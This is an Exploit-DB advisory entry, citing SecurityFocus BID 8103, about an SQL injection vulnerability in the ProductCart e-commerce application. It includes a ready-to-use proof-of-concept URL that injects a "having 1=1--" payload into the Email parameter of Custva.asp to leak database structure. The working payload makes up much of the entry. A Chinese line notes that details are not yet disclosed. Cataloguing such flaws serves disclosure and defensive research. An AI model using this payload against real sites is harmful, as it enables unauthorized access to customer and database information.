https://www.exploit-db.com/exploits/22864

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8103/info

ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to reveal information relating to the underlying database; other attacks may also be possible.

http://www.example.com/productcart/pc/Custva.asp?redirectUrl=&Email=%27+having+1
%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit